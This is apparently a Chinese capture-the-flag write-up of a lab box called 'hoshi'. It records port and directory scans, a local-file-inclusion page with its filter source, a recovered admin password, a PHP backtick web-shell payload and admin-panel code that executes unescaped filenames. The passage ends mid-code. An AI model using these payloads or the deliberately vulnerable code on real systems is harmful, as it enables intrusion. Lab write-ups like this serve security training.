![\"Pasted](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506260958417.png\")
<\/div><\/p>\n\u505a\u7684\u597d\u7528\u5fc3\u554a\uff01<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h1>\n\u7aef\u53e3\u626b\u63cf<\/h2>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ sudo arp-scan -I eth0 -l | grep PCS\n[sudo] password for kali: \n192.168.10.104 08:00:27:d2:ec:10 PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ IP=192.168.10.104\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ sudo nmap -sS $IP \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-21 20:30 EDT\nNmap scan report for 192.168.10.104\nHost is up (0.00047s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\nMAC Address: 08:00:27:D2:EC:10 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.69 seconds\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI don't always scan ports, but when I do, I prefer RustScan.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan\\'s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.104:22\nOpen 192.168.10.104:80\n[~] Starting Script(s)\n[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV" on ip 192.168.10.104\nDepending on the complexity of the script, results may take some time to appear.\n[~] Starting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-21 20:30 EDT\nNSE: Loaded 157 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nInitiating ARP Ping Scan at 20:30\nScanning 192.168.10.104 [1 port]\nCompleted ARP Ping Scan at 20:30, 0.05s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 20:30\nCompleted Parallel DNS resolution of 1 host. at 20:30, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating SYN Stealth Scan at 20:30\nScanning 192.168.10.104 [2 ports]\nDiscovered open port 22\/tcp on 192.168.10.104\nDiscovered open port 80\/tcp on 192.168.10.104\nCompleted SYN Stealth Scan at 20:30, 0.02s elapsed (2 total ports)\nInitiating Service scan at 20:30\nScanning 2 services on 192.168.10.104\nCompleted Service scan at 20:30, 6.10s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.10.104.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 1.07s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.02s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNmap scan report for 192.168.10.104\nHost is up, received arp-response (0.00034s latency).\nScanned at 2025-06-21 20:30:19 EDT for 7s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)\n| ssh-hostkey: \n| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F\/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff\/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15\/h5hBsS\/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT\/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9\/wPmo6RBeb1d5t11SP8R5UHyI\/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=\n| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F\/EIiQoIHE=\n| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n|_http-title: \\xE5\\x95\\x86\\xE5\\x93\\x81\\xE5\\x8F\\x8D\\xE9\\xA6\\x88 - \\xE6\\x98\\x9F\\xE9\\x99\\x85\\xE5\\x95\\x86\\xE5\\x9F\\x8E\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.62 (Debian)\nMAC Address: 08:00:27:D2:EC:10 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nRead data files from: \/usr\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 8.85 seconds\n Raw packets sent: 3 (116B) | Rcvd: 5 (600B)<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h2>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: zip,php,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 279]\n\/.html (Status: 403) [Size: 279]\n\/info.php (Status: 200) [Size: 85755]\n\/index.php (Status: 200) [Size: 7954]\n\/uploads (Status: 301) [Size: 318] [--> http:\/\/192.168.10.104\/uploads\/]\n\/admin.php (Status: 200) [Size: 2726]\n\/robots.txt (Status: 200) [Size: 86]\n\/.php (Status: 403) [Size: 279]\n\/.html (Status: 403) [Size: 279]\n\/server-status (Status: 403) [Size: 279]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h1>\n\u654f\u611f\u76ee\u5f55<\/h2>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/192.168.10.104 [200 OK] Apache[2.4.62], Country[RESERVED][ZZ], Email[support@interstellar.dsz], HTML5, HTTPServer[Debian Linux][Apache\/2.4.62 (Debian)], IP[192.168.10.104], Script, Title[\u5546\u54c1\u53cd\u9988 - \u661f\u9645\u5546\u57ce]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \n\ufffd\ufffd\u057e\ufffd\ufffd logo \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd https:\/\/maze-sec.com\/special\/1\/\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u01f8\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u02f5\ufffd\ufffd\u0631\ufffd\u0121\ufffd\u03b6\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\u672c\u7ad9\u7684 logo \u7075\u611f\u6765\u81ea https:\/\/maze-sec.com\/special\/1\/\uff0c\u4f46\u6211\u4eec\u7ed9\u5b83\u6dfb\u4e86\u70b9\u7279\u522b\u7684\u2018\u5473\u9053\u2019\uff01\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt | base64 \nsb7VvrXEIGxvZ28gwem40MC019QgaHR0cHM6Ly9tYXplLXNlYy5jb20vc3BlY2lhbC8xL6OstavO\n0sPHuPjL\/Mztwcu148zYsfC1xKGuzra1wKGvo6E=<\/code><\/pre>\n\n\u8fd9\u91cc\u7684\u4e2d\u6587\u662f\u63d0\u793a\uff0c\u8981\u6253\u5f00\u770b\u4e00\u4e0b\uff01\uff01\uff01\uff01\uff01\uff01<\/p>\n<\/blockquote>\n
![\"Pasted](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u5947\u5947\u602a\u602a\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u7136\u540e\u5728info.php<\/code>\u53d1\u73b0\u4e86\u4e00\u4e9b\u4e1c\u897f\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u597d\u50cf\u5229\u7528\u6761\u4ef6\u6ca1\u6709\u90a3\u4e48\u82db\u523b\u554a\uff0c\u53ef\u4ee5\u4e0a\u4f20\uff0c\u4e0d\u80fd\u5305\u542b\uff0c\u672a\u7981\u7528\u76f8\u5173\u51fd\u6570\u3002
\n\u7136\u540e\u770b\u5230\u4e86\u7ba1\u7406\u5458\u540e\u53f0\uff1aadmin.php<\/code><\/p>\n<\/div><\/p>\n\u9996\u5148\u6392\u9664\u7206\u7834\uff1f\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u6ca1\u53d1\u73b0\u5565\uff0c\u6293\u4e2a\u5305\u770b\u770b\uff1a<\/p>\n
POST \/admin.php HTTP\/1.1\nHost: 192.168.10.104\nOrigin: http:\/\/192.168.10.104\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/137.0.0.0 Safari\/537.36\nContent-Type: application\/x-www-form-urlencoded\nReferer: http:\/\/192.168.10.104\/admin.php\nAccept-Language: zh-CN,zh;q=0.9\nAccept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=6hb67scf650da0doj6lvcbdt2m\nContent-Length: 17\n\npassword=password<\/code><\/pre>\n\u662f\u4e00\u4e2a post \u4f20\u53c2\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6ce8\u5165\u6f0f\u6d1e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ sqlmap -r sql --batch --level 4 --risk 3<\/code><\/pre>\n\u672a\u53d1\u73b0\u5229\u7528\u70b9\uff0c\u7ee7\u7eed\u770b\uff1a
\n![[Pasted image 20250622084602.png]] <\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/feedbacks.json\n[\n {\n "username": null,\n "email": "",\n "product": "",\n "feedback": "",\n "filename": "_20250622003025.txt",\n "timestamp": "2025-06-22 00:30:25"\n },\n {\n "username": null,\n "email": "",\n "product": "",\n "feedback": "",\n "filename": "_20250622003026.txt",\n "timestamp": "2025-06-22 00:30:26"\n }\n]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/_20250622003025.txt\n=== Feedback Details ===\nName: \nEmail: \nProduct: \nTime: 2025-06-22 00:30:25\nFeedback:\n\n================\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/_20250622003026.txt\n=== Feedback Details ===\nName: \nEmail: \nProduct: \nTime: 2025-06-22 00:30:26\nFeedback:\n\n================<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u4e00\u4e0b\u524d\u53f0\u7684\u90a3\u4e2a\u6295\u8bc9\u7cfb\u7edf\uff0c\u770b\u770b\u6709\u5565\u60c5\u51b5\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/whoami_20250622010014.txt \n=== Feedback Details ===\nName: whoami\nEmail: whoami@id\nProduct: whoami\nTime: 2025-06-22 01:00:14\nFeedback:\nwhoami\n================<\/code><\/pre>\n\u591a\u6b21\u5c1d\u8bd5\uff0c\u4f3c\u4e4e\u4e0d\u4f1a\u8fdb\u884c\u89e3\u6790\u3002\u3002\u3002\u3002
\n\u4f46\u662f\u53d1\u73b0\u4e86\u4e00\u4e9b\u6709\u610f\u601d\u7684\u4e8b\u60c5\uff1a<\/p>\n
<?=`$_GET[0]`?>\n<?=`$_GET[0]`?><\/code><\/pre>\n\u88ab\u8f6c\u4e49\u4e86\u3002\u3002\u3002\u3002\u3002\u3002
\n\u5c1d\u8bd5\u57df\u540d\u89e3\u6790\uff0c\u4f46\u662f\u4f3c\u4e4e\u5e76\u4e0d\u662f\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ dirsearch -u http:\/\/interstellar.dsz\/ 2>\/dev\/null \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/hoshi\/reports\/http_interstellar.dsz\/__25-06-22_12-01-58.txt\n\nTarget: http:\/\/interstellar.dsz\/\n\n[12:01:58] Starting: \n[12:02:00] 403 - 281B - \/.ht_wsr.txt\n[12:02:00] 403 - 281B - \/.htaccess.bak1\n[12:02:00] 403 - 281B - \/.htaccess.orig\n[12:02:00] 403 - 281B - \/.htaccess_extra\n[12:02:00] 403 - 281B - \/.htaccess.save\n[12:02:00] 403 - 281B - \/.htaccess.sample\n[12:02:00] 403 - 281B - \/.htaccess_sc\n[12:02:00] 403 - 281B - \/.htaccess_orig\n[12:02:00] 403 - 281B - \/.htaccessBAK\n[12:02:00] 403 - 281B - \/.htaccessOLD\n[12:02:00] 403 - 281B - \/.htaccessOLD2\n[12:02:00] 403 - 281B - \/.html\n[12:02:00] 403 - 281B - \/.htm\n[12:02:00] 403 - 281B - \/.htpasswd_test\n[12:02:00] 403 - 281B - \/.htpasswds\n[12:02:00] 403 - 281B - \/.httr-oauth\n[12:02:01] 403 - 281B - \/.php\n[12:02:10] 200 - 1KB - \/admin.php\n[12:02:42] 200 - 23KB - \/info.php\n[12:03:02] 200 - 109B - \/robots.txt\n[12:03:04] 403 - 281B - \/server-status\n[12:03:04] 403 - 281B - \/server-status\/\n[12:03:14] 301 - 322B - \/uploads -> http:\/\/interstellar.dsz\/uploads\/\n[12:03:14] 200 - 682B - \/uploads\/\n\nTask Completed<\/code><\/pre>\n\u53cc\u56fe\u76f2\u6c34\u5370<\/h2>\n
\u7136\u540e\u8981\u4e86\u63d0\u793a\uff0cQQ.png,\u53cc\u56fe\u76f2\u6c34\u5370<\/code>\u3002\u3002\u3002\u3002\u3002
\n\u8fd9\u662f\u5728\u6e90\u4ee3\u7801\u51fa\u73b0\u8fc7\u7684\uff0c\u6211\u4e00\u76f4\u4ee5\u4e3a\u53ea\u662f\u4e00\u4e2alogo\u3002\u3002\u3002\u3002<\/p>\n\n\u53cc\u56fe+\u76f2\u6c34\u5370_\u53cc\u56fe\u76f2\u6c34\u5370-CSDN\u535a\u5ba2<\/a>
\nGitHub - chishaxie\/BlindWaterMark: \u76f2\u6c34\u5370 by python<\/a><\/p>\n<\/blockquote>\n\u770b\u4e00\u4e0b\u8fd9\u4e2a\u53cc\u56fe\u76f2\u6c34\u5370\u662f\u4e2a\u5565\u60c5\u51b5\uff1a<\/p>\n
# wget http:\/\/192.168.10.104\/QQ.png\n# wget https:\/\/maze-sec.com\/img\/QQ.png -O QQ2.png\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ \/usr\/local\/python3.9\/bin\/python3.9 ~\/tools\/BlindWaterMark\/bwmforpy3.py decode QQ.png QQ2.png result.png\nMatplotlib is building the font cache; this may take a moment.\nimage<QQ.png> + image(encoded)<QQ2.png> -> watermark<result.png>\n[ WARN:0@8.589] global loadsave.cpp:848 imwrite_ Unsupported depth image for selected encoder is fallbacked to CV_8U.<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u662f\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/hoshi\/gift.php \n<p style='color:red'>\u975e\u6cd5\u6587\u4ef6\u540d<\/p> <\/code><\/pre>\n\u540e\u9762\u7ed3\u5408\u6e90\u4ee3\u7801\u8fdb\u884c\u5206\u6790\u5427\uff0c\u4e0d\u7136\u8bd5\u9519\u6709\u70b9\u75db\u82e6\u7684\u3002\u3002\u3002<\/p>\n
LFI<\/h2>\n
\u8fd9\u91cc\u7684\u6e90\u4ee3\u7801\u4e3a\uff1a<\/p>\n
# gift.php\n<?php\n\n$allow_dir = realpath(__DIR__ . '\/..\/') . '\/';\n$filename = isset($_GET['file']) ? $_GET['file'] : '';\n\n\/\/ \u53ea\u5141\u8bb8\u5305\u542bhtml\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\uff0c\u4e14\u4e0d\u80fd\u5305\u542b'..'\u548c'php:'\u7b49\u4f2a\u534f\u8bae\nif (\n $filename &&\n strpos($filename, '..') === false &&\n strpos($filename, 'php:') === false &&\n strpos($filename, ':\/\/') === false &&\n strpos($filename, 'filter') === false &&\n strpos($filename, 'data:') === false &&\n strpos($filename, 'zip:') === false &&\n strpos($filename, 'phar:') === false &&\n strpos($filename, 'glob:') === false &&\n strpos($filename, 'expect:') === false &&\n strpos($filename, 'input') === false &&\n preg_match('\/^[a-zA-Z0-9_\\-\\.]+$\/', $filename)\n) {\n $target = $allow_dir . $filename;\n if (file_exists($target)) {\n \/\/ \u5305\u88f9php\u4ee3\u7801\uff0c\u6f14\u793a\u6587\u4ef6\u5305\u542b+RCE\n echo "<pre>";\n include($target);\n echo "<\/pre>";\n } else {\n echo "<p style='color:red'>\u6587\u4ef6\u4e0d\u5b58\u5728<\/p>";\n }\n} else {\n echo "<p style='color:red'>\u975e\u6cd5\u6587\u4ef6\u540d<\/p>";\n}\n?><\/code><\/pre>\n\u4ec5\u5141\u8bb8\u5305\u542b\u672c\u6587\u4ef6\u4e0b\u7684\u6587\u4ef6\uff0c\u6545\u5fc5\u987b\u5f97\u5c1d\u8bd5FUZZ\u5230\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ ffuf -u "http:\/\/$IP\/hoshi\/gift.php?FUZZ=index.html" -c -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -fr "\u975e\u6cd5" 2>\/dev\/null\nfile [Status: 200, Size: 40, Words: 2, Lines: 1, Duration: 1ms]<\/code><\/pre>\n\u7136\u540e\u5229\u7528\u8be5\u53c2\u6570\u8fdb\u884c\u5305\u542b\u672c\u5730\u6587\u4ef6\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s "http:\/\/$IP\/hoshi\/gift.php?file=index.html" \n<p style='color:red'>\u6587\u4ef6\u4e0d\u5b58\u5728<\/p><\/code><\/pre>\n\u957f\u5ea6\u4e0e\u524d\u9762\u7684\u975e\u6cd5\u6587\u4ef6\u540d<\/code>\u4e00\u81f4\uff0c\u6240\u4ee5\u5f88\u96be\u6d4b\u8bd5\u51fa\u6765\u3002\u3002\u3002\u3002\u3002<\/p>\nhttp:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.php<\/code><\/pre>\n<\/div><\/p>\n\u662f\u4e00\u4e2a\u7578\u5f62\u7684\u754c\u9762\uff0c\u4f46\u662f\u540e\u9762\u6709\u7528\u7684\uff01\uff01\uff01\uff01<\/p>\n
\u8fd9\u91cc\u7fa4\u91cc\u53c8\u6709\u63d0\u793a\uff0c\u5bc6\u7801\u65e0\u9700\u7206\u7834\uff0c\u5c31\u5728\u754c\u9762\u4e2d\uff0c<\/p>\n
<\/div><\/p>\n<\/div><\/p>\n\u4e00\u95ea\u4e00\u95ea\u7684\u5ba2\u670d\u7535\u8bdd\u5c31\u662f\u63d0\u793a\uff0c\u6240\u4ee5\uff0c\u5982\u679c\u8db3\u591f\u7684\u7528\u4e8e\u5c1d\u8bd5\uff0c\u5176\u5b9e\u5f88\u65e9\u5c31\u53ef\u4ee5\u8bd5\u51fa\u6765\uff0c\u4f46\u662f\u81f3\u5c11\u6211\u6ca1\u641e\u51fa\u6765\uff0c\u5bb3\u3002\u3002\u3002<\/p>\n
\u8fd9\u5c31\u662f\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\nRCE<\/h2>\n
\u8fd9\u91cc\u9700\u8981\u53c2\u8003\u6e90\u4ee3\u7801\u4e86\uff1a<\/p>\n
<?php\nob_start();\n?>\n---------------------------------\n <!-- \u767b\u5f55\u8868\u5355 -->\n <?php\n session_start();\n $admin_password = '400-123-4567';\n if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['password'])) {\n if ($_POST['password'] === $admin_password) {\n $_SESSION['logged_in'] = true;\n } else {\n echo '<p class="text-yellow-500 text-center error-message mb-6">\u5bc6\u7801\u9519\u8bef\uff01<\/p>';\n }\n }\n\n if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {\n ?>\n <form action="" method="POST" class="bg-gray-800 p-8 rounded-lg glow mb-12 max-w-md mx-auto">\n <div class="mb-6">\n <label for="password" class="block text-sm font-medium text-gray-300">\u7ba1\u7406\u5458\u5bc6\u7801<\/label>\n <input type="password" name="password" id="password" required class="mt-1 p-3 w-full bg-gray-700 border border-gray-600 rounded-md text-white focus:ring-2 focus:ring-blue-500" placeholder="\u8bf7\u8f93\u5165\u5bc6\u7801">\n <\/div>\n <button type="submit" class="w-full bg-blue-600 hover:bg-blue-700 text-white font-bold py-3 px-4 rounded-md transition duration-300">\u767b\u5f55<\/button>\n <\/form>\n <?php } else { ?>\n\n <!-- \u7edf\u8ba1\u6570\u636e -->\n <div class="bg-gray-800 p-8 rounded-lg glow">\n <h2 class="text-2xl font-semibold text-white mb-6">\u53cd\u9988\u7edf\u8ba1\u6982\u89c8<\/h2>\n <p class="text-gray-300 mb-4">\u4ee5\u4e0b\u662f\u7528\u6237\u63d0\u4ea4\u7684\u5546\u54c1\u53cd\u9988\u7edf\u8ba1\u6570\u636e\uff0c\u5305\u542b\u53cd\u9988\u603b\u6570\u3001\u6587\u4ef6\u6570\u91cf\u53ca\u5b58\u50a8\u5360\u7528\u60c5\u51b5\u3002\u6240\u6709\u53cd\u9988\u6587\u4ef6\u53ef\u5728<a href="uploads\/" class="text-blue-500 hover:underline">\u53cd\u9988\u6863\u6848\u76ee\u5f55<\/a>\u4e2d\u67e5\u770b\u3002<\/p>\n <?php\n $upload_dir = __DIR__ . '\/uploads\/';\n $metadata_file = $upload_dir . 'feedbacks.json';\n\n \/\/ \u7edf\u8ba1\u53cd\u9988\u603b\u6570\n $total_feedbacks = 0;\n $user_counts = [];\n $product_counts = [];\n if (file_exists($metadata_file)) {\n $feedbacks = json_decode(file_get_contents($metadata_file), true);\n if (is_array($feedbacks)) {\n $total_feedbacks = count($feedbacks);\n foreach ($feedbacks as $fb) {\n $username = $fb['username'];\n $product = $fb['product'];\n $user_counts[$username] = ($user_counts[$username] ?? 0) + 1;\n $product_counts[$product] = ($product_counts[$product] ?? 0) + 1;\n }\n } else {\n echo '<p class="text-yellow-400 text-center error-message mb-4">\u65e0\u6cd5\u89e3\u6790\u53cd\u9988\u6570\u636e\uff01<\/p>';\n }\n } else {\n echo '<p class="text-yellow-400 text-center error-message mb-4">\u53cd\u9988\u6570\u636e\u6587\u4ef6\u4e0d\u5b58\u5728\uff01<\/p>';\n }\n\n \/\/ \u65b0\u7edf\u8ba1\u9762\u677f\uff0c\u904d\u5386\u76ee\u5f55\u5e76\u6e32\u67d3\u6587\u4ef6\u540d\uff08\u4e0d\u505a\u8f6c\u4e49\uff0c\u5141\u8bb8php\u4ee3\u7801\u6267\u884c\uff09\n $file_count = 0;\n $total_size = 0;\n $files = glob($upload_dir . '*.txt');\n echo '<div class="bg-gray-700 p-6 rounded-md mb-8">';\n echo '<h2 class="text-xl font-bold text-blue-400 mb-4">\u53cd\u9988\u6587\u4ef6\u5217\u8868<\/h2>';\n echo '<table class="min-w-full text-left text-gray-200"><thead><tr><th class="py-2">\u6587\u4ef6\u540d<\/th><th class="py-2">\u5927\u5c0f<\/th><th class="py-2">\u64cd\u4f5c<\/th><\/tr><\/thead><tbody>';\n foreach ($files as $file) {\n $filename = basename($file);\n $size = filesize($file);\n $file_count++;\n $total_size += $size;\n echo '<tr><td class="py-1 px-2 border-b">';\n echo $filename;\n echo '<\/td><td class="py-1 px-2 border-b">' . $size . ' B<\/td>';\n echo '<td class="py-1 px-2 border-b">';\n echo '<form method="POST" style="display:inline" onsubmit="return confirm(\\'\u786e\u5b9a\u8981\u5220\u9664\u6b64\u6587\u4ef6\u5417\uff1f\\');">';\n echo '<input type="hidden" name="delete_file" value="' . htmlspecialchars($filename) . '"><button type="submit" class="text-red-400 hover:text-red-600 underline">\u5220\u9664<\/button>';\n echo '<\/form>';\n echo '<\/td><\/tr>';\n }\n echo '<\/tbody><\/table>';\n echo '<div class="mt-4 text-blue-300">\u603b\u6587\u4ef6\u6570: ' . $file_count . '\uff0c\u603b\u5927\u5c0f: ' . ($total_size > 1024 ? number_format($total_size\/1024,1).' KB' : $total_size.' B') . '<\/div>';\n echo '<\/div>';\n\n echo '<h3 class="text-lg font-semibold text-blue-400 mb-2">\u7528\u6237\u53cd\u9988\u7edf\u8ba1<\/h3>';\n echo '<ul class="list-disc list-inside text-gray-200 mb-4">';\n if (count($user_counts) === 0) {\n echo '<li>\u6682\u65e0\u6570\u636e<\/li>';\n } else {\n foreach ($user_counts as $user => $count) {\n echo '<li>' . htmlspecialchars($user) . ': ' . $count . ' \u6761\u53cd\u9988<\/li>';\n }\n }\n echo '<\/ul>';\n\n echo '<h3 class="text-lg font-semibold text-blue-400 mb-2">\u5546\u54c1\u53cd\u9988\u7edf\u8ba1<\/h3>';\n echo '<ul class="list-disc list-inside text-gray-200">';\n if (count($product_counts) === 0) {\n echo '<li>\u6682\u65e0\u6570\u636e<\/li>';\n } else {\n foreach ($product_counts as $product => $count) {\n echo '<li>' . htmlspecialchars($product) . ': ' 